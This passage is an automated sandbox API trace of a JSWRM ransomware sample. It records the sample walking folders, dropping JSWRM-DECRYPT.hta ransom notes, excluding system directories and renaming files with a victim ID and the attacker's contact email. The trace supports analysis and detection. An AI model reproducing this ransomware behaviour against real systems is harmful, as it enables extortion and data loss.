HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0068.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.807] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0068.808] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.808] WriteFile (in: hFile=0x298, lpBuffer=0x345bf70*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bf3c, lpOverlapped=0x0 | out: lpBuffer=0x345bf70*, lpNumberOfBytesWritten=0x345bf3c*=0x230c, lpOverlapped=0x0) returned 1 [0068.809] CloseHandle (hObject=0x298) returned 1 [0068.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24dfa0 | out: hHeap=0x1e0000) returned 1 [0068.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0068.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0068.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0068.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.810] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\jswrm-decrypt.hta")) returned 0x20 [0068.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0068.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.810] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\*.*", lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4accd6e1, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4accd6e1, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x1fac5d57, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName=".", cAlternateFileName="")) returned 0x231b40 [0068.810] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.810] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4accd6e1, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4accd6e1, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x1fac5d57, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="..", cAlternateFileName="")) returned 1 [0068.810] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.810] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.810] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fac5d57, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1fac5d57, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1fac5d57, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.810] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.810] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.810] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.810] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.810] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.810] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.810] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.810] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.810] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.810] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0068.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241218, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0068.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0068.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.811] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4accd6e1, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x3ba48, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="OSE.EXE", cAlternateFileName="")) returned 1 [0068.811] lstrcmpiW (lpString1="OSE.EXE", lpString2=".") returned 1 [0068.811] lstrcmpiW (lpString1="OSE.EXE", lpString2="..") returned 1 [0068.811] lstrcmpiW (lpString1="OSE.EXE", lpString2="...") returned 1 [0068.811] lstrcmpiW (lpString1="OSE.EXE", lpString2="windows") returned -1 [0068.811] lstrcmpiW (lpString1="OSE.EXE", lpString2="recovery") returned -1 [0068.811] lstrcmpiW (lpString1="OSE.EXE", lpString2="perflogs") returned -1 [0068.811] lstrcmpiW (lpString1="OSE.EXE", lpString2="documents and settings") returned 1 [0068.811] lstrcmpiW (lpString1="OSE.EXE", lpString2="$RECYCLE.BIN") returned 1 [0068.811] lstrcmpiW (lpString1="OSE.EXE", lpString2="system volume information") returned -1 [0068.811] lstrcmpiW (lpString1="OSE.EXE", lpString2="msocache") returned 1 [0068.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSE.EXE", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0068.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSE.EXE", cchWideChar=7, lpMultiByteStr=0x345ef40, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OSE.EXE", lpUsedDefaultChar=0x0) returned 7 [0068.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSE.EXE", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0068.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSE.EXE", cchWideChar=7, lpMultiByteStr=0x345ef10, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OSE.EXE", lpUsedDefaultChar=0x0) returned 7 [0068.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0068.811] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4accd6e1, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x3ba48, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="OSE.EXE", cAlternateFileName="")) returned 0 [0068.811] FindClose (in: hFindFile=0x231b40 | out: hFindFile=0x231b40) returned 1 [0068.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0068.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.812] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b5538f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a412e70, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0068.812] lstrcmpiW (lpString1="Stationery", lpString2=".") returned 1 [0068.812] lstrcmpiW (lpString1="Stationery", lpString2="..") returned 1 [0068.812] lstrcmpiW (lpString1="Stationery", lpString2="...") returned 1 [0068.812] lstrcmpiW (lpString1="Stationery", lpString2="windows") returned -1 [0068.812] lstrcmpiW (lpString1="Stationery", lpString2="recovery") returned 1 [0068.812] lstrcmpiW (lpString1="Stationery", lpString2="perflogs") returned 1 [0068.812] lstrcmpiW (lpString1="Stationery", lpString2="documents and settings") returned 1 [0068.812] lstrcmpiW (lpString1="Stationery", lpString2="$RECYCLE.BIN") returned 1 [0068.812] lstrcmpiW (lpString1="Stationery", lpString2="system volume information") returned -1 [0068.812] lstrcmpiW (lpString1="Stationery", lpString2="msocache") returned 1 [0068.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0068.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224c40 | out: hHeap=0x1e0000) returned 1 [0068.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0068.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0068.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0068.812] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\jswrm-decrypt.hta")) returned 0xffffffff [0068.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.814] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.814] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345be5c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24c1d0 [0068.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24dfa0 [0068.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0068.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0068.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0068.815] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0068.816] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.816] WriteFile (in: hFile=0x298, lpBuffer=0x345bf70*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bf3c, lpOverlapped=0x0 | out: lpBuffer=0x345bf70*, lpNumberOfBytesWritten=0x345bf3c*=0x230c, lpOverlapped=0x0) returned 1 [0068.817] CloseHandle (hObject=0x298) returned 1 [0068.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24dfa0 | out: hHeap=0x1e0000) returned 1 [0068.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0068.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0068.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0068.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0068.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0068.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0068.817] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\jswrm-decrypt.hta")) returned 0x20 [0068.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0068.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0068.817] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\*.*", lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b5538f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1faebf90, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName=".", cAlternateFileName="")) returned 0x231b00 [0068.817] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.817] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b5538f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1faebf90, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="..", cAlternateFileName="")) returned 1 [0068.817] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.817] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.817] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d8079e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d8079e, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d8079e, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xff, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="Bears.htm", cAlternateFileName="")) returned 1 [0068.818] lstrcmpiW (lpString1="Bears.htm", lpString2=".") returned 1 [0068.818] lstrcmpiW (lpString1="Bears.htm", lpString2="..") returned 1 [0068.818] lstrcmpiW (lpString1="Bears.htm", lpString2="...") returned 1 [0068.818] lstrcmpiW (lpString1="Bears.htm", lpString2="windows") returned -1 [0068.818] lstrcmpiW (lpString1="Bears.htm", lpString2="recovery") returned -1 [0068.818] lstrcmpiW (lpString1="Bears.htm", lpString2="perflogs") returned -1 [0068.818] lstrcmpiW (lpString1="Bears.htm", lpString2="documents and settings") returned -1 [0068.818] lstrcmpiW (lpString1="Bears.htm", lpString2="$RECYCLE.BIN") returned 1 [0068.818] lstrcmpiW (lpString1="Bears.htm", lpString2="system volume information") returned -1 [0068.818] lstrcmpiW (lpString1="Bears.htm", lpString2="msocache") returned -1 [0068.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bears.htm", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0068.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bears.htm", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Bears.htm", lpUsedDefaultChar=0x0) returned 9 [0068.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0068.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bears.htm", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0068.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bears.htm", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Bears.htm", lpUsedDefaultChar=0x0) returned 9 [0068.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0068.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0068.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0068.818] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.819] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10049536280073920) returned 0 [0068.819] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.819] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.819] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.819] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.819] CloseHandle (hObject=0xffffffff) returned 1 [0068.819] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0068.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0068.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0068.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0068.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0068.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0068.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.820] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.htm.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0068.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0068.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: 